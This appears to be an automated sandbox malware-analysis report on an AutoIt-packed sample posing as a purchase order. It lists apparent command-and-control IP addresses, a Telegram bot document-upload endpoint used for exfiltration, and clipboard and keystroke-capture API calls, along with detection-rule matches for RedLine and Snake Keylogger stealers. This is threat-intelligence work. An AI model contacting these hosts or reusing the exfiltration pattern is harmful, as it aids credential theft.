                        Source: Grinnellia.exe, 00000016.00000002.2250241974.0000000000B5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/d3
                        Source: alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/pmxflidirkcbpvm
                        Source: alg.exe, 00000003.00000003.2133063417.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2149828169.000000000060E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/pmxflidirkcbpvm.Sy
                        Source: alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/pmxflidirkcbpvmtV
                        Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/uqppkasccjtxk
                        Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/uqppkasccjtxkC
                        Source: alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/pmxflidirkcbpvm
                        Source: Grinnellia.exe, 00000016.00000002.2251340435.0000000000C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/uqppkasccjtxk
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099138098.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/%&
                        Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/&uX
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/7&3
                        Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/?uA
                        Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/V
                        Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/f
                        Source: Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000002.2099585917.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fowvjqhq
                        Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tp
                        Source: alg.exe, 00000003.00000003.2092069897.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2101091606.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tp$V
                        Source: alg.exe, 00000003.00000003.2124461247.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tpz
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ucqpyyl
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073325882.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ucqpyylY
                        Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ygrk
                        Source: Grinnellia.exe, 0000000B.00000002.2128861465.0000000000C4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ygrkx
                        Source: alg.exe, 00000003.00000003.2093209407.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/z
                        Source: Grinnellia.exe, 00000008.00000002.2099138098.0000000000B72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/fowvjqhq
                        Source: alg.exe, 00000003.00000003.2093209407.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2124461247.00000000005D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/tpU
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000002.2073106501.0000000000C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ucqpyyl
                        Source: Grinnellia.exe, 0000000B.00000002.2126725116.0000000000AEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ygrk
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                        Source: server01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                        Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                        Source: powershell.exe, 00000010.00000002.2246819288.0000000007583000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2262728885.0000000008452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                        Source: RegSvcs.exe, 00000018.00000002.2277102302.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                        Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
                        Source: server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                        Source: server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: server01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: alg.exe, 00000003.00000003.3026352524.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011197647.0000000001440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
                        Source: alg.exe, 00000003.00000003.3026882137.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011446827.0000000001440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/8
                        Source: alg.exe, 00000003.00000003.2360118722.0000000001570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
                        Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                        Source: alg.exe, 00000003.00000003.2874426747.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                        Source: setup.exe1.3.drString found in binary or memory: https://clients2.google.com/cr/report
                        Source: alg.exe, 00000003.00000003.2404059376.0000000001570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                        Source: alg.exe, 00000003.00000003.2404646007.0000000001570000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2404981914.0000000001570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                        Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: alg.exe, 00000003.00000003.2874497887.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                        Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/
                        Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/bug/new
                        Source: setup.exe1.3.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                        Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                        Source: alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                        Source: alg.exe, 00000003.00000003.2874231233.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                        Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                        Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75d
                        Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75l
                        Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports
                        Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..
                        Source: alg.exe, 00000003.00000003.3070682412.0000000001440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/8
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00456B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00456B0C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00456D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00456D07
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00456B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00456B0C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00442B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00442B37
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0046F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0046F7FF

                        System Summary

                        barindex
                        Source: 11.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 8.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 22.2.Grinnellia.exe.4090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: This is a third-party compiled AutoIt script.0_2_00403D19
                        Source: PO #09465610_GQ 003745_SO-242000846.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000000.2050804216.00000000004AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_04b9153f-b
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000000.2050804216.00000000004AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_edd32d31-6
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2069359739.000000000414D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3eb42a62-7
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2069359739.000000000414D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c365588c-c
                        Source: Grinnellia.exe, 00000008.00000000.2070051988.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3de340c9-e
                        Source: Grinnellia.exe, 00000008.00000000.2070051988.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0783fee8-4
                        Source: Grinnellia.exe, 0000000B.00000000.2096012714.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2bda5fce-a
                        Source: Grinnellia.exe, 0000000B.00000000.2096012714.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_31be2241-2
                        Source: Grinnellia.exe, 00000016.00000002.2247421636.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_be3efd0b-5
                        Source: Grinnellia.exe, 00000016.00000002.2247421636.00000000004AE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_331c8108-d
                        Source: PO #09465610_GQ 003745_SO-242000846.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d396653d-f
                        Source: PO #09465610_GQ 003745_SO-242000846.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8ec60ef9-5
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.14.dr 665670656Jump to dropped file
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00446606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00446606
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0043ACC5
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004479D3
                        Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.binJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0040E3E30_2_0040E3E3
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0042B0430_2_0042B043
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004132000_2_00413200
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043410F0_2_0043410F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004202A40_2_004202A4
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043038E0_2_0043038E
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043467F0_2_0043467F
